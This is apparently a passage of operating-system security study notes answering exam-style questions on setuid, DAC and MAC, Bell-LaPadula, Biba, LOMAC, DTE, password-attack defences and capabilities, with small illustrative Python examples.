g) In UNIX, setuid bits are not honored on certain file systems such as the floppy drive. What would be the security loopholes that would arise if we honored the setuid bit on all file systems?
--------------------------------------------------------------------------------------

Removable media should be mounted with the nosuid option. Otherwise an attacker could prepare, on a machine she controls, a copy of bash owned by root with the setuid bit set, mount the disk on the target system and run it, obtaining a shell with root privileges: the target kernel would be trusting ownership and mode bits that were written by a foreign system.
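To make the umask arithmetic of e) concrete, the following is an added example (written for this page, not part of the original notes): it computes the resulting mode from the requested mode and the umask, and then actually creates a file and a directory under a given umask in a temporary directory to confirm what the kernel does. The function names are ours.

```python
import os
import stat
import tempfile

# Added example: how umask is applied. POSIX clears the umask bits from the
# mode requested by the creating process: new_mode = requested & ~umask.


def default_mode(requested: int, umask: int) -> int:
    """Mode a new object gets when a process requests `requested` under `umask`."""
    return requested & ~umask & 0o777


def create_with_umask(umask: int):
    """Create a file and a directory under `umask` in a scratch directory and
    return their actual modes as (file_mode, dir_mode).
    open(2) requests 0666 for the file, mkdir(2) requests 0777 for the directory."""
    old = os.umask(umask)
    try:
        with tempfile.TemporaryDirectory() as d:
            path = os.path.join(d, "f")
            fd = os.open(path, os.O_CREAT | os.O_WRONLY, 0o666)
            os.close(fd)
            sub = os.path.join(d, "sub")
            os.mkdir(sub, 0o777)
            return (stat.S_IMODE(os.stat(path).st_mode),
                    stat.S_IMODE(os.stat(sub).st_mode))
    finally:
        os.umask(old)  # umask is process-wide state: always restore it


if __name__ == "__main__":
    for m in (0o022, 0o077):
        print(oct(m), [oct(x) for x in create_with_umask(m)])
```

Note that umask only removes bits; it can never grant more than the creating call asked for, which is why a umask of 022 yields 644 for files but 755 for directories.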
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

11)

--------------------------------------------------------------------------------------
a) What weaknesses of DAC motivate MAC?
--------------------------------------------------------------------------------------

When a user sets the access control on an object, it is discretionary access control (DAC); when the system controls access to an object and the user cannot modify it, it is mandatory access control (MAC). DAC does not differentiate between a user and the processes she runs: every program runs with the full rights of its user. Moreover, DAC relies on file owners correctly setting permissions, which does not always happen, for lack of knowledge or care. This motivates a control mechanism where permissions are set by a central policy and it is ensured that the defined policies are followed.

--------------------------------------------------------------------------------------
b) How does the interpretation of confidentiality labels differ from that of integrity labels on files?
--------------------------------------------------------------------------------------

They are different concepts. An integrity label on an object expresses the reliability of the contained data, resulting from a past verification procedure, and ensures that the object can be modified only by authorized (at least as trustworthy) subjects. A confidentiality label ensures that the object can be read only by authorized subjects (secrecy or privacy) and defines a policy for its future use. In multi-level security (MLS) access control they differ in their two rules. Confidentiality (Bell-LaPadula) has 'no read up' and 'no write down': the first prevents unauthorized access to a higher classification, the second prevents leaking higher classified information to a lower level. Integrity (Biba) has 'no read down' and 'no write up': the first ensures that high-integrity subjects are not contaminated by lower-integrity data, the second that lower-integrity subjects cannot write to higher-integrity objects.

--------------------------------------------------------------------------------------
c) Explain the problem with the basic Biba model that is addressed by the LOMAC model.
--------------------------------------------------------------------------------------

In the Biba model, the 'no read down' rule protects the integrity of a subject by forbidding it to read lower-integrity objects at all, which is too restrictive for real programs. In the Low Water Mark policy (LOMAC), subjects are allowed to read down: the read is permitted, but the subject's integrity label is lowered to that of the object it read (the subject is downgraded; in the implementation the reading process, a copy of the original subject, carries the lowered label). Unlike Biba, LOMAC thus permits higher-integrity subjects to read from lower-integrity objects, but afterwards the downgraded label prevents them from writing to higher-integrity objects.
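The rules of b) and c) side by side, as an added example written for this page (not code from the original notes): the three policies are expressed as check functions over a subject and an object with integer labels, and one scenario shows where Biba and LOMAC diverge. Subject, Object and the function names are ours; labels are integers, higher meaning more sensitive (confidentiality) or more trustworthy (integrity).

```python
# Added example: Bell-LaPadula, Biba and LOMAC as explicit label checks.
from dataclasses import dataclass


@dataclass
class Subject:
    name: str
    label: int


@dataclass
class Object:
    name: str
    label: int


# Confidentiality (Bell-LaPadula): no read up, no write down.
def blp_read(s: Subject, o: Object) -> bool:
    return s.label >= o.label


def blp_write(s: Subject, o: Object) -> bool:
    return s.label <= o.label


# Strict integrity (Biba): no read down, no write up.
def biba_read(s: Subject, o: Object) -> bool:
    return s.label <= o.label


def biba_write(s: Subject, o: Object) -> bool:
    return s.label >= o.label


# Low water mark (LOMAC): every read is allowed, but reading lower-integrity
# data drags the subject's label down to that of the object (a side effect).
def lomac_read(s: Subject, o: Object) -> bool:
    s.label = min(s.label, o.label)
    return True


def lomac_write(s: Subject, o: Object) -> bool:
    # Same rule as Biba, evaluated on the current (possibly lowered) label.
    return s.label >= o.label


BLP = (blp_read, blp_write)
BIBA = (biba_read, biba_write)
LOMAC = (lomac_read, lomac_write)


def run_scenario(policy):
    """A subject at integrity 2 reads an untrusted object (label 1) and then
    tries to write a trusted object (label 2).
    Returns (read_allowed, write_allowed, final_subject_label)."""
    read, write = policy
    s = Subject("editor", 2)
    untrusted = Object("download.txt", 1)
    trusted = Object("/etc/passwd", 2)
    r = read(s, untrusted)
    w = write(s, trusted)
    return (r, w, s.label)


if __name__ == "__main__":
    print("Biba :", run_scenario(BIBA))    # read denied, write allowed, label 2
    print("LOMAC:", run_scenario(LOMAC))   # read allowed, write denied, label 1
```

Biba stops the flow at the read; LOMAC lets the read happen and stops the flow at the later write, which is why a LOMAC subject that has touched untrusted input can no longer modify trusted files.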
--------------------------------------------------------------------------------------
d) Summarize the main difficulties with MLS that have precluded its use in commercial OSes.
-------------------------------------------------------------------------------------

The difficulties with MLS are information flow problems such as:
* Label creep: objects tend to get higher labels over time, becoming unavailable to lower-level subjects.
* The model does not deal with the creation or destruction of subjects or objects.
* Labelling all the objects of a large system is difficult (the whole system is hard to configure).
* Most importantly, real workloads need exceptions to the rules: the system cannot accommodate ordinary operations without many of them. It requires 'trusted subjects' (trusted programs) that can bypass the security model, which does not work well with modern software environments.

--------------------------------------------------------------------------------------
e) What is the central problem with MLS that can be addressed by DTE?
--------------------------------------------------------------------------------------

The central problem with MLS is that too many programs end up tagged as trusted, and some of them may hide vulnerabilities. Domain and Type Enforcement (DTE) is an access control mechanism that controls how accesses are granted to programs, defining domains (sets of subjects) and types (sets of objects), so that limited trust can be expressed for these programs. DTE policies restrict accesses from domains to types and transitions from one domain to another, granting a program only the rights it needs to perform its function (principle of least privilege).

--------------------------------------------------------------------------------------
f) What are the main drawbacks of DTE?
-------------------------------------------------------------------------------------

The issues are scalability (it tends towards one domain per application) and complexity (policies are difficult to develop and administer).

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
12) Security mechanisms are layered, i.e., security of a higher layer is based on the security mechanisms provided by the lower layer. Now, suppose that a layer is not trustworthy. Is there a way to build a secure mechanism on top? Give one example where it is possible, another where it is not. Your answer should be no longer than 60 words.
--------------------------------------------------------------------------------------

An example where it is possible: the X server needs access to hardware resources but is large and not fully trustworthy. Instead of running it as root, a small privileged layer started as root from the boot scripts exposes only a safe set of hardware operations, which the unprivileged server calls. A counter-example is a process that depends directly on setuid programs: if the kernel mechanism beneath them is untrustworthy, nothing built on top can be secured.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
13) State the principle of least privilege. How does its application make a process more secure? (40 words or less.)
--------------------------------------------------------------------------------------

The secure system design principle of 'least privilege' states that every process (program or user) of the system should operate with the smallest set of privileges needed to do its job. This limits the damage a compromised or faulty process can cause and reduces the number of interactions among privileged processes (avoiding misuse).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
14) Among the following measures, identify if each measure provides increased protection against online attacks (L), offline attacks (F), or both (B).
--------------------------------------------------------------------------------------

L Introducing delays before prompting for passwords after each incorrect password.
L Account lock-out after three unsuccessful login attempts. (Online attacks require an attacker to type the password on the target system and make it perform the authentication, so slowing or stopping that loop is what these two measures do.)
F Use of salt in UNIX passwords. (The salt is stored in the clear and applied by the system itself, so online guessing is unaffected; it defeats precomputed tables and forces offline cracking to be repeated for every account, even for users sharing a password.)
F Storing only encrypted (hashed) versions of passwords on the system.
F Making the encrypted password file unreadable except by root. (An attacker who cannot read the hashes cannot crack them offline; online guessing against the login program is still possible.)
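Why salt counts as an offline defence, as an added example written for this page (not from the original notes): a small password file is built with and without salt, and an offline attacker with a copy of the file runs the same dictionary against it. sha256 stands in for the password hash (a deployed system would use a slow KDF such as bcrypt, scrypt or argon2), and the user database and dictionary are constructed for the demonstration; all names are ours.

```python
# Added example: salting and the cost of offline dictionary attacks.
import hashlib
import os


def h(password: str, salt: bytes = b"") -> str:
    """Stand-in password hash: sha256(salt || password)."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def store(users: dict, salted: bool) -> dict:
    """Build the password file. Salted entries keep the salt in the clear
    (as /etc/shadow does); unsalted entries store only the hash."""
    db = {}
    for name, pw in users.items():
        salt = os.urandom(8) if salted else b""
        db[name] = (salt, h(pw, salt))
    return db


def duplicates_visible(db: dict) -> bool:
    """Without salt, two users with the same password have the same hash,
    which is visible before any cracking is done."""
    digests = [d for _, d in db.values()]
    return len(digests) != len(set(digests))


def offline_crack(db: dict, dictionary: list):
    """Attacker holding a copy of the file. Returns (cracked, hash_computations).
    Unsalted: hash each word once, then look every user up in that table
    (with a precomputed table the work would be zero).
    Salted: the work has to be redone for every user."""
    cracked, work = {}, 0
    unsalted = all(salt == b"" for salt, _ in db.values())
    if unsalted:
        table = {}
        for w in dictionary:
            table[h(w)] = w
            work += 1
        for name, (_, digest) in db.items():
            if digest in table:
                cracked[name] = table[digest]
    else:
        for name, (salt, digest) in db.items():
            for w in dictionary:
                work += 1
                if h(w, salt) == digest:
                    cracked[name] = w
                    break
    return cracked, work


# Constructed sample data for the demonstration.
USERS = {"alice": "letmein", "bob": "letmein", "carol": "Tr0ub4dor&3"}
DICTIONARY = ["password", "123456", "letmein", "qwerty"]

if __name__ == "__main__":
    for salted in (False, True):
        db = store(USERS, salted)
        print("salted" if salted else "unsalted",
              duplicates_visible(db), offline_crack(db, DICTIONARY))
```

An online attacker never sees the salt or the hash: the login program applies both, so each guess costs one login attempt whichever way the file is stored. That is the reason the measure is F rather than B.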
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
15) Which of the following statements are true about the concept of capabilities?
--------------------------------------------------------------------------------------

T Capabilities correspond to the row-wise representation of an access control matrix. (Such a matrix has user ids corresponding to rows and resources corresponding to columns; an ACL is one column, a capability list is one row.)
T UNIX file descriptors represent a form of capabilities.
T Contemporary OSes don't use capabilities to control access to persistent resources, but may use them to mediate access to transient objects. (In UNIX, permission bits are attached to persistent objects such as files; transient objects such as sockets and open connections are reached only through descriptors, which act as capabilities.)
F POSIX capabilities represent a partial implementation of capabilities. (POSIX "capabilities" partition the privileges of root; they are not object capabilities in the computer-science sense.)
T Kerberos tickets are capabilities.
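The row/column view of the first statement, and the revocation cost raised in d) of question 10, in one added example written for this page (not code from the original notes): the same access matrix is kept as ACLs (one list per object) and as capability lists (one per subject), and revoking every right on one object is performed in both representations. The subjects, objects and rights are constructed; the function names are ours.

```python
# Added example: ACLs versus capability lists derived from one access matrix,
# and what revoking all access to an object costs in each representation.

# Constructed access matrix: subject -> {object: set(rights)}.
MATRIX = {
    "alice": {"/etc/passwd": {"r"}, "/home/alice/notes": {"r", "w"}},
    "bob":   {"/etc/passwd": {"r"}, "/var/log/syslog": {"r"}},
    "root":  {"/etc/passwd": {"r", "w"}, "/var/log/syslog": {"r", "w"}},
}


def to_acls(matrix: dict) -> dict:
    """Column-wise: object -> {subject: rights}."""
    acls = {}
    for subj, row in matrix.items():
        for obj, rights in row.items():
            acls.setdefault(obj, {})[subj] = set(rights)
    return acls


def to_caplists(matrix: dict) -> dict:
    """Row-wise: subject -> {object: rights}; each entry is a capability."""
    return {subj: {obj: set(r) for obj, r in row.items()}
            for subj, row in matrix.items()}


def check_acl(acls: dict, subj: str, obj: str, right: str) -> bool:
    return right in acls.get(obj, {}).get(subj, set())


def check_cap(caplists: dict, subj: str, obj: str, right: str) -> bool:
    return right in caplists.get(subj, {}).get(obj, set())


def revoke_object_acl(acls: dict, obj: str) -> int:
    """ACL: the object's own list is the single place to edit.
    Returns the number of lists touched."""
    acls.pop(obj, None)
    return 1


def revoke_object_caps(caplists: dict, obj: str) -> int:
    """Capabilities: the object keeps no record of who holds a capability
    for it, so every subject's list has to be scanned.
    Returns the number of lists touched."""
    touched = 0
    for caps in caplists.values():
        touched += 1
        caps.pop(obj, None)
    return touched


if __name__ == "__main__":
    acls, caps = to_acls(MATRIX), to_caplists(MATRIX)
    print("ACL lists touched :", revoke_object_acl(acls, "/etc/passwd"))
    print("cap lists touched :", revoke_object_caps(caps, "/etc/passwd"))
```

The asymmetry is the whole point of d): with ACLs the cost of revoking an object is constant, with capability lists it grows with the number of subjects, and in a real system the lists may live in other processes or on other machines, which is why expiry dates are used instead.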
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

-------------------------------------------------------------------------------------
16) Which of the following statements about the setuid/setgid mechanism are correct?
--------------------------------------------------------------------------------------

T The setuid mechanism provides a way for a user to delegate her privileges to a program, so that these privileges are available to the program even when it is run by a different user.
T The setgid bit should be disabled on removable media drives.
T setuid provides a mechanism for privilege amplification.
F Every privileged process is started via the execution of a setuid-to-root program. (Daemons started by init at boot already run as root without any setuid binary.)
F A problem with setuid programs is that no one can use a debugger on them. (Unprivileged users cannot trace a process running with a different effective uid, but root can.)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
17) Which of the following statements are correct?
--------------------------------------------------------------------------------------

F SELinux relies on system-call interception to enforce DTE policies. (It uses hooks inside the kernel, not interception of the system-call interface.)
T The Clark-Wilson policy is aimed at integrity rather than confidentiality.
T The Chinese Wall policy is aimed at both confidentiality and integrity.
F Information flow policies can be used for protecting confidentiality but not integrity.
F SELinux relies on MAC, but does not use DAC. (The ordinary DAC checks are still applied first.)
F Separation of duty is a principle designed to ensure that each well-formed transaction preserves data consistency/integrity. (That is the role of well-formed transactions; separation of duty splits a task among several people.)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
18) On Windows, the key sequence Ctrl-Alt-Del causes the operating system to assume command of the keyboard and prevent key strokes from reaching other user-level processes. Which security principle or property is most closely related to this behavior?
--------------------------------------------------------------------------------------

It is a trusted path: a mechanism that ensures the integrity of the communication channel between the user and the system, so that the user can be certain the authentication dialogue (and the password typed into it) reaches the real login component and not a user program imitating it.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

--------------------------------------------------------------------------------------
19) Identify the key advantage of DTE over MLS. Also identify the main advantage of MLS over DTE. (40 words or less.)
--------------------------------------------------------------------------------------

MLS requires us to trust whole processes, while DTE assigns each domain exactly the access rights it needs (enforcing the principle of least privilege). MLS policies are simpler than DTE policies and map directly to high-level objectives such as confidentiality and integrity.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
